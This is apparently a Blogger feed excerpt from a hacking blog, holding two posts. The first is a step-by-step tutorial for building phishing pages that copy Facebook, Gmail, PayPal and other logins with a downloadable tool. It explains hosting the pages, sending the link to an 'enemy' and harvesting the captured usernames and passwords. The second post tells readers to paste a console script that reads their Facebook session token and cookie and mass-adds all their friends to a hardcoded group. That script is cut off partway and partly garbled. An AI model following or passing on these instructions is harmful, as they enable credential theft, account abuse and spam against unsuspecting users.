72.764014299999957</georss:box></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-6329854453086015554</id><published>2014-03-25T17:48:00.000+05:00</published><updated>2014-03-25T17:54:09.925+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Phishing Hacking"/><title type='text'>How To Make Phishing Page Of (Facebook, Twitter, Youtube, Gmail, Yahoo, Hotmail, Paypal, Pyaza, Google etc) - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot; style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;post-header&quot;&gt;
&lt;/div&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Hey guys here is &lt;a href=&quot;http://facebook.com/PrinceOfSahuka&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;Muhammad Shahbaz&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Today we are discus about how to make&amp;nbsp;phishing&amp;nbsp;page easily&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Phishing is use for hack login details of victim which you want to hack &amp;amp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;it is one type of fake page&lt;/span&gt;.&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Here is one tool who make your&amp;nbsp;phishing&amp;nbsp;page in 1 click&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;No need&amp;nbsp;knowledge&amp;nbsp;of html ,php or any other knowledge of developing.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Let i will tell you how to create fake web pages and steal your friends username and password&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;Now Start Our Tutorial&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img alt=&quot;How To Make Phishing Page Of (Facebook, Twitter, Youtube, Paypal, Pyaza, Google etc) - FOCSoft&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjspBWGP-FykLYCAAfMff86T43CTndqOEZMs7t3k8dOz0lXBmuf6hvOu0FRd9jQD3ebzN78A0VQAA8CyfyNz81bU19mcS1Gy0Odspns8_1WBAi4PTlvhQYFXgnLnyhmIx1p1nOPcAhKPS8/s400/ac58c18ea0ndster.jpg&quot; height=&quot;270&quot; title=&quot;How To Make Phishing Page Of (Facebook, Twitter, Youtube, Paypal, Pyaza, Google etc) - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;1)&lt;/b&gt;. First of all download Super &lt;b&gt;&lt;u&gt;Phisher&lt;/u&gt;&lt;/b&gt; here :-&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;    &lt;/span&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://freakshare.com/files/svukljyq/Super-phisher-1.0.rar.html&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;2).&lt;/b&gt; Extract it and open super phisher&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp; it will look like top photo&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;3).&lt;/b&gt;In the field &quot;URL of the login page&quot; type the url of the login page of website of which u want to create fake web page&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;Example For yahoo :- http://mail.yahoo.com , for gmail: &amp;nbsp; http://www.gmail.com&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;4).&lt;/b&gt;&quot; name of log file &quot; is file where your enemy details would be &amp;nbsp; &amp;nbsp;saved .you can give any name.txt&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;5).&lt;/b&gt; .php file is the main file here is the source of phisher&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;name .php&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;6).&lt;/b&gt; In the last field u have to type the url where u want to redirect the enemy after login ,it can be anything&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp; example:- Facebook.com&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;7).&lt;/b&gt; Click on build phisher .&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;8).&lt;/b&gt; This creates two output files in output folder included&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;9).&lt;/b&gt; Create your free hosting account on any of these sites&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;ul&gt;
&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.youfreehosting.net/&quot;&gt;http://www.youfreehosting.net&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp; &lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;a href=&quot;http://www.t35.com/&quot;&gt;http://www.t35.com&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp; &lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;a href=&quot;http://www.byethost.com/&quot;&gt;http://www.byethost.com&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;10).&lt;/b&gt; Upload those two files on your free hosting account. (Note:-zip this folder and upload for better result)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;11).&lt;/b&gt;Send the link of your phisher(.php) to your enemy&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;12).&lt;/b&gt; When he will login on this page a .txt file will be created on your free hosting account containing his login details&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;13).&lt;/b&gt; Check hosting folder for login details&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;You are done :)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Enjoy Hacking&lt;/span&gt;,....&lt;br /&gt;
&lt;span style=&quot;font-size: x-large;&quot;&gt;For More Join Us At&lt;/span&gt;&amp;nbsp; &lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot; target=&quot;_blank&quot;&gt;Hacking Tools And Hacking Tools&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/6329854453086015554/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/Phishing.html#comment-form' title='50 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/6329854453086015554'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/6329854453086015554'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/Phishing.html' title='How To Make Phishing Page Of (Facebook, Twitter, Youtube, Gmail, Yahoo, Hotmail, Paypal, Pyaza, Google etc) - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjspBWGP-FykLYCAAfMff86T43CTndqOEZMs7t3k8dOz0lXBmuf6hvOu0FRd9jQD3ebzN78A0VQAA8CyfyNz81bU19mcS1Gy0Odspns8_1WBAi4PTlvhQYFXgnLnyhmIx1p1nOPcAhKPS8/s72-c/ac58c18ea0ndster.jpg" height="72" width="72"/><thr:total>50</thr:total><georss:featurename>Būrewāla, Pakistan</georss:featurename><georss:point>30.15 72.683333299999958</georss:point><georss:box>30.0950815 72.60265229999996 30.204918499999998 72.764014299999957</georss:box></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-9163804655781161865</id><published>2014-03-21T21:26:00.002+05:00</published><updated>2014-03-21T21:34:25.044+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tips And Tricks"/><title type='text'>How To Add All Friends In Group (Super Fast Way) 2014 - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Hello Friends,.. &lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;span style=&quot;color: red;&quot;&gt;Assalam O Alikum&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Today I&#39;m Sharing A Facebook Script ( &lt;span style=&quot;color: red;&quot;&gt;&lt;i&gt;Auto Friends Adder In Group&lt;/i&gt;&lt;/span&gt; )&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;span style=&quot;color: purple;&quot;&gt;For This Purpose We Need &lt;a href=&quot;http://firefox.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Firefox&lt;/a&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
First Of All Open &lt;a href=&quot;http://www.facebook.com/groups/270219893156884&quot; target=&quot;_blank&quot;&gt;Facebook Group&lt;/a&gt; &amp;gt; Then Press &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Ctrl+Shift+k&lt;/span&gt;&lt;/b&gt; . &lt;br /&gt;
Then Paste This Script In &lt;b&gt;Console&lt;/b&gt; .....&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br /&gt;&lt;/code&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&amp;nbsp;// ==UserScript==&lt;/blockquote&gt;
&lt;blockquote&gt;
// @name Add All Friends To Group By SHAHBAZ&lt;br /&gt;
// @namespace Hacking Tools And Hacking Tutorials&lt;br /&gt;
// @author Muhammad Shahbaz&lt;br /&gt;
// @include *://*.facebook.com/PrinceOfSahuka*&lt;br /&gt;
// @grant none&lt;br /&gt;
// @description Add All Your Friends To Facebook Group With Single Click&lt;br /&gt;
// @version 1&lt;br /&gt;
// ==/UserScript==&lt;br /&gt;
var T = 0;&lt;br /&gt;
var scss = 0;&lt;br /&gt;
var fail = 0;&lt;br /&gt;
var Allids = [];&lt;br /&gt;
var freeform = [];&lt;br /&gt;
var userStop = false;&lt;br /&gt;
var fb_dtsg = &quot;&quot;;&lt;br /&gt;
var user = &quot;672632971&quot;;&quot;672632971&quot;&lt;br /&gt;
var GroupId = &quot;270219893156884&quot;;&lt;br /&gt;
var lang = document.documentElement.lang;&lt;br /&gt;
if ([&quot;ar&quot;].indexOf(lang) &amp;lt; 0) {&lt;br /&gt;
lang = &quot;en&quot;;&lt;br /&gt;
} else {&lt;br /&gt;
lang = &quot;ar&quot;;&lt;br /&gt;
}&lt;br /&gt;
var locales = {&lt;br /&gt;
&quot;ar&quot;: {&lt;br /&gt;
&quot;addbstr&quot;: &quot;????? ?? ????????&quot;,&lt;br /&gt;
&quot;dlgtstr&quot;: &quot;????? ???????? ??????&quot;,&lt;br /&gt;
&quot;dlgwstr&quot;: &quot;?? ???? ????? ?????? ...&quot;,&lt;br /&gt;
&quot;dlgastr&quot;: &quot;???? ?? ???? ??? ????? ??? ??? ??? ????????&quot;,&lt;br /&gt;
&quot;dlgfstr&quot;: &quot;??? ????????&quot;,&lt;br /&gt;
&quot;dlgpstr&quot;: &quot;??????&quot;,&lt;br /&gt;
&quot;dlgrstr&quot;: &quot;????&quot;,&lt;br /&gt;
&quot;dlgsstr&quot;: &quot;????&quot;,&lt;br /&gt;
&quot;dlgistr&quot;: &quot;???&quot;,&lt;br /&gt;
&quot;dlgostr&quot;: &quot;?????&quot;,&lt;br /&gt;
&quot;dlgfsstr&quot;: &quot;??? ?? ??????? (?????? ??????? ?? ????? ?? ????????)&quot;,&lt;br /&gt;
&quot;dlgffstr&quot;: &quot;?? ??????? ?????&quot;,&lt;br /&gt;
&quot;dlgcnstr&quot;: &quot;?????&quot;,&lt;br /&gt;
&quot;dlgclstr&quot;: &quot;?????&quot;&lt;br /&gt;
},&lt;br /&gt;
&quot;en&quot;: {&lt;br /&gt;
&quot;addbstr&quot;: &quot;Add All Friends&quot;,&lt;br /&gt;
&quot;dlgtstr&quot;: &quot;Adding Friends to Group&quot;,&lt;br /&gt;
&quot;dlgwstr&quot;: &quot;Www.FOCSoft.Blogspot.Com&quot;,&lt;br /&gt;
&quot;dlgastr&quot;: &quot;This May Take Some Time Depending On Your Friends Number&quot;,&lt;br /&gt;
&quot;dlgfstr&quot;: &quot;Approximately Friends Numbers&quot;,&lt;br /&gt;
&quot;dlgpstr&quot;: &quot;Processed&quot;,&lt;br /&gt;
&quot;dlgrstr&quot;: &quot;Remaining&quot;,&lt;br /&gt;
&quot;dlgsstr&quot;: &quot;Successed&quot;,&lt;br /&gt;
&quot;dlgistr&quot;: &quot;Failed&quot;,&lt;br /&gt;
&quot;dlgostr&quot;: &quot;Finish&quot;,&lt;br /&gt;
&quot;dlgfsstr&quot;: &quot;Faild to Add (Can&#39;t Add or Already a member)&quot;,&lt;br /&gt;
&quot;dlgffstr&quot;: &quot;Added successfully&quot;,&lt;br /&gt;
&quot;dlgcnstr&quot;: &quot;Cancel&quot;,&lt;br /&gt;
&quot;dlgclstr&quot;: &quot;Close&quot;&lt;br /&gt;
}&lt;br /&gt;
};&lt;br /&gt;
var addbstr = locales[lang].addbstr;&lt;br /&gt;
var dlgtstr = locales[lang].dlgtstr;&lt;br /&gt;
var dlgwstr = locales[lang].dlgwstr;&lt;br /&gt;
var dlgastr = locales[lang].dlgastr;&lt;br /&gt;
var dlgfstr = locales[lang].dlgfstr;&lt;br /&gt;
var dlgpstr = locales[lang].dlgpstr;&lt;br /&gt;
var dlgrstr = locales[lang].dlgrstr;&lt;br /&gt;
var dlgsstr = locales[lang].dlgsstr;&lt;br /&gt;
var dlgistr = locales[lang].dlgistr;&lt;br /&gt;
var dlgfsstr = locales[lang].dlgfsstr;&lt;br /&gt;
var dlgffstr = locales[lang].dlgffstr;&lt;br /&gt;
var dlgcnstr = locales[lang].dlgcnstr;&lt;br /&gt;
var dlgclstr = locales[lang].dlgclstr;&lt;br /&gt;
var dlgostr = locales[lang].dlgostr;&lt;br /&gt;
CheckUrl(location.href);&lt;br /&gt;
var oldLocation = location.href;&lt;br /&gt;
setInterval(function() {&lt;br /&gt;
if(location.href != oldLocation) {&lt;br /&gt;
oldLocation = location.href;&lt;br /&gt;
CheckUrl(location.href);&lt;br /&gt;
}&lt;br /&gt;
}, 500);&lt;br /&gt;
function CheckUrl(place) {&lt;br /&gt;
if (/\/groups([\/?]|$)/i.test(place)) {&lt;br /&gt;
Main();&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
function Main() {&lt;br /&gt;
setTimeout(function(){ Main(); }, 500);&lt;br /&gt;
var settingsbutton = document.querySelector(&quot;#group_edit_settings_button&quot;);&lt;br /&gt;
var settingsbuttoncheck = setInterval(function() {&lt;br /&gt;
if (!document.getElementById(&#39;fbga&#39;) &amp;amp;&amp;amp; settingsbutton) {&lt;br /&gt;
clearInterval(settingsbuttoncheck);&lt;br /&gt;
var groupsActions = settingsbutton.parentElement.parentElement;&lt;br /&gt;
var addbutton = document.createElement(&quot;a&quot;);&lt;br /&gt;
addbutton.className = &quot;uiSelectorButton uiButton&quot;;&lt;br /&gt;
addbutton.id = &quot;fbga&quot;;&lt;br /&gt;
var addbuttoninht = &quot;&lt;span br=&quot;&quot; cl=&quot;&quot;&gt;addbuttoninht += &quot;ass=&#39;uiButtonText&#39;&amp;gt;&quot; + addbstr + &quot;&lt;/span&gt;&quot;;&lt;br /&gt;
addbutton.innerHTML = addbuttoninht;&lt;br /&gt;
addbutton.href = &quot;#&quot;;&lt;br /&gt;
addbutton.addEventListener(&#39;click&#39;, GetFriends, false)&lt;br /&gt;
var addbuttonli = document.createElement(&quot;li&quot;);&lt;br /&gt;
addbuttonli.appendChild(addbutton);&lt;br /&gt;
groupsActions.insertBefore(addbuttonli, groupsActions.firstChild);&lt;br /&gt;
}&lt;br /&gt;
}, 10);&lt;br /&gt;
}&lt;br /&gt;
function GetFriends() {&lt;br /&gt;
if (!document.getElementById(&#39;fbgadialog&#39;)) {&lt;br /&gt;
userStop = false;&lt;br /&gt;
fb_dtsg = document.getElementsByName(&#39;fb_dtsg&#39;)[0].value;&lt;br /&gt;
user = getCookie(&quot;c_user&quot;);&lt;br /&gt;
GroupId = document.getElementsByName(&#39;group_id&#39;)[0].value;&lt;br /&gt;
var now = &quot;&amp;amp;uid=&quot; + (new Date).getTime();&lt;br /&gt;
var params = &#39;__a=1&amp;amp;viewer=&#39; + user + &#39;&amp;amp;filter[0]=user&amp;amp;__user=&#39; ;&lt;br /&gt;
params += user + now;&lt;br /&gt;
with (new XMLHttpRequest) {&lt;br /&gt;
open(&#39;GET&#39;, &#39;/ajax/typeahead/first_degree.php?&#39; + params, true);&lt;br /&gt;
send();&lt;br /&gt;
var result = &quot;&quot;;&lt;br /&gt;
onreadystatechange = function (){&lt;br /&gt;
if (this.readyState == 4) {&lt;br /&gt;
if (this.status == 200) {&lt;br /&gt;
if (this.responseText) {&lt;br /&gt;
result = this.responseText;&lt;br /&gt;
result = result.substr(result.indexOf(&quot;[{&quot;)+2);&lt;br /&gt;
result = result.replace(/},{/gi, &quot;\r\n&quot;);&lt;br /&gt;
GetIds(result);&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
function GetIds(res){&lt;br /&gt;
Allids = [];&lt;br /&gt;
freeform = [];&lt;br /&gt;
T = 0;&lt;br /&gt;
scss = 0;&lt;br /&gt;
fail = 0;&lt;br /&gt;
rre = res.split(&quot;\r\n&quot;);&lt;br /&gt;
for (var i = 0; i &amp;lt; rre.length; i++) {&lt;br /&gt;
var lin = rre[i].split(&quot;,&quot;);&lt;br /&gt;
var id = lin[0].split(&quot;:&quot;).pop();&lt;br /&gt;
var nam = lin[3].split(&quot;:&quot;).pop();&lt;br /&gt;
nam = nam.replace(/\&quot;/gi,&quot;&quot;);&lt;br /&gt;
freeform.push(nam)&lt;br /&gt;
Allids.push(id);&lt;br /&gt;
}&lt;br /&gt;
AddToGroup();&lt;br /&gt;
}&lt;br /&gt;
function AddToGroup() {&lt;br /&gt;
var AddDiv = document.createElement(&quot;div&quot;);&lt;br /&gt;
AddDiv.className = &quot;_10 uiLayer&quot;;&lt;br /&gt;
AddDiv.id = &quot;fbgadialog&quot;;&lt;br /&gt;
AddDiv.setAttribute(&quot;role&quot;, &quot;dialog&quot;);&lt;br /&gt;
var bodytxt = &quot;&lt;br /&gt;
&lt;div class=&quot;_1yv&quot; role=&quot;dialog&quot; style=&quot;margin-top: 97.5px; width: 445px;&quot;&gt;
&lt;div class=&quot;_1yu&quot;&gt;
&lt;div class=&quot;_t&quot;&gt;
&lt;div class=&quot;pvs phm _1yw&quot;&gt;
&quot; + dlgtstr + &quot;&lt;/div&gt;
&lt;div class=&quot;pam _13&quot;&gt;
&lt;div id=&quot;fbgadlglin1&quot; style=&quot;font-size: 20px; font-weight: bold;&quot;&gt;
&quot; + dlgwstr + &quot;&lt;/div&gt;
&lt;div id=&quot;fbgadlglin2&quot; style=&quot;font-weight: bold;&quot;&gt;
&quot; + dlgastr + &quot;&lt;/div&gt;
&lt;div id=&quot;fbgadlglin3&quot;&gt;
&quot; + dlgfstr + &quot; : &lt;span id=&quot;fbgafn&quot; style=&quot;color: blue; font-weight: bold;&quot;&gt;&quot; + Allids.length + &quot;&lt;/span&gt;&lt;/div&gt;
&lt;div id=&quot;fbgadlglin4&quot;&gt;
&quot; + dlgpstr + &quot; : &lt;span id=&quot;fbgapro&quot; style=&quot;color: brown; font-weight: bold;&quot;&gt;0&lt;/span&gt; | &quot; + dlgrstr + &quot; : &lt;span id=&quot;fbgaram&quot; style=&quot;font-weight: bold;&quot;&gt;&quot; + Allids.length + &quot;&lt;/span&gt; | &quot; + dlgsstr + &quot; : &lt;span id=&quot;fbgasuc&quot; style=&quot;color: green; font-weight: bold;&quot;&gt;0&lt;/span&gt; | &quot; + dlgistr + &quot; : &lt;span id=&quot;fbgafal&quot; style=&quot;color: red; font-weight: bold;&quot;&gt;0&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&quot;;&lt;br /&gt;
AddDiv.innerHTML = bodytxt;&lt;br /&gt;
document.body.appendChild(AddDiv);&lt;br /&gt;
var dlgclose = document.createElement(&quot;a&quot;);&lt;br /&gt;
dlgclose.className = &quot;_42ft _42fu layerCancel uiOverlayButton _42gy&quot;;&lt;br /&gt;
dlgclose.setAttribute(&quot;role&quot;, &quot;button&quot;);&lt;br /&gt;
dlgclose.href = &quot;#&quot;;&lt;br /&gt;
dlgclose.id = &quot;fbgabut&quot;;&lt;br /&gt;
dlgclose.textContent = dlgcnstr;&lt;br /&gt;
dlgclose.addEventListener(&#39;click&#39;, CancelButton , false);&lt;br /&gt;
document.getElementById(&quot;fbgadivclose&quot;).appendChild(dlgclose);&lt;br /&gt;
setTimeout(doinggo , 100);&lt;br /&gt;
}&lt;br /&gt;
function CancelButton() {&lt;br /&gt;
userStop = true;&lt;br /&gt;
}&lt;br /&gt;
function doinggo() {&lt;br /&gt;
if (T &amp;lt; Allids.length &amp;amp;&amp;amp; !userStop) {&lt;br /&gt;
var params = &quot;fb_dtsg=&quot; + fb_dtsg + &quot;&amp;amp;group_id=&quot; + GroupId ; &lt;br /&gt;
params += &quot;&amp;amp;source=typeahead&amp;amp;ref=&amp;amp;message_id=u_0_0&amp;amp;members=&quot; ;&lt;br /&gt;
params += Allids[T] + &quot;&amp;amp;freeform=&quot; + encodeURIComponent(freeform[T]);&lt;br /&gt;
params += &quot;&amp;amp;__user=&quot; + user + &quot;&amp;amp;__a=1&amp;amp;__req=f&quot;;&lt;br /&gt;
params += &quot;&amp;amp;phstamp=&quot; + generatePhstamp(params, fb_dtsg);&lt;br /&gt;
with (new XMLHttpRequest) {&lt;br /&gt;
open(&#39;POST&#39;, &#39;/ajax/groups/members/add_post.php&#39;, true);&lt;br /&gt;
send(params);&lt;br /&gt;
var msg = &quot;&quot;;&lt;br /&gt;
console.log(&quot;onreadystatechange&quot;);&lt;br /&gt;
onreadystatechange = function() {&lt;br /&gt;
if (this.readyState == 4) {&lt;br /&gt;
if (this.status == 200) {&lt;br /&gt;
if (this.responseText) {&lt;br /&gt;
console.log(&quot;responseText&quot;);&lt;br /&gt;
msg = this.responseText;&lt;br /&gt;
if (msg.indexOf(&quot;errorSummary&quot;) !== -1) {&lt;br /&gt;
fail++&lt;br /&gt;
document.getElementById(&quot;fbgapro&quot;).textContent = T + 1;&lt;br /&gt;
document.getElementById(&quot;fbgaram&quot;).textContent = (Allids.length - T - 1);&lt;br /&gt;
document.getElementById(&quot;fbgafal&quot;).textContent = fail;&lt;br /&gt;
T++&lt;br /&gt;
setTimeout(doinggo, 10); &lt;br /&gt;
} else {&lt;br /&gt;
scss++&lt;br /&gt;
document.getElementById(&quot;fbgapro&quot;).textContent = T + 1;&lt;br /&gt;
document.getElementById(&quot;fbgaram&quot;).textContent = (Allids.length - T - 1);&lt;br /&gt;
document.getElementById(&quot;fbgasuc&quot;).textContent = scss;&lt;br /&gt;
T++&lt;br /&gt;
setTimeout(doinggo, 10);&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
} else {&lt;br /&gt;
document.getElementById(&quot;fbgadlglin1&quot;).textContent = dlgostr;&lt;br /&gt;
document.getElementById(&quot;fbgadlglin2&quot;).innerHTML = &quot;&lt;span id=&quot;fbgafn&quot; style=&quot;color: gree; font-weight: bold;&quot;&gt;&quot; + scss + &quot;&lt;/span&gt; &quot; + dlgffstr;&lt;br /&gt;
document.getElementById(&quot;fbgadlglin3&quot;).setAttribute(&quot;style&quot;, &quot;font-weight:bold;&quot;);&lt;br /&gt;
document.getElementById(&quot;fbgadlglin3&quot;).innerHTML = &quot;&lt;span id=&quot;fbgafn&quot; style=&quot;color: red; font-weight: bold;&quot;&gt;&quot; + fail + &quot;&lt;/span&gt; &quot; + dlgfsstr;&lt;br /&gt;
